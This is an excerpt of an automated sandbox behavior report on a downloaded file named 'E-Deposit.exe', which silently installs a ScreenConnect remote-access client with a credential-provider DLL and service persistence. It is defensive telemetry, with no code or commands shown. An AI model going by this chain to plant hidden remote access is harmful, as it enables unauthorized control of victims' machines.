                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: amsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: msasn1.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: gpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasman.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rtutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winhttp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ntmarta.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Downloads\E-Deposit.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Downloads\E-Deposit.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

                      Persistence and Installation Behavior

                      barindex
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\c44d2632-26e1-42de-afb1-4cd72c859c46.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71C1.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6898.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\Unconfirmed 367452.crdownloadJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6898.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI71C1.tmpJump to dropped file
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (484f9eed1d8e13b9)
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\E-Deposit.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
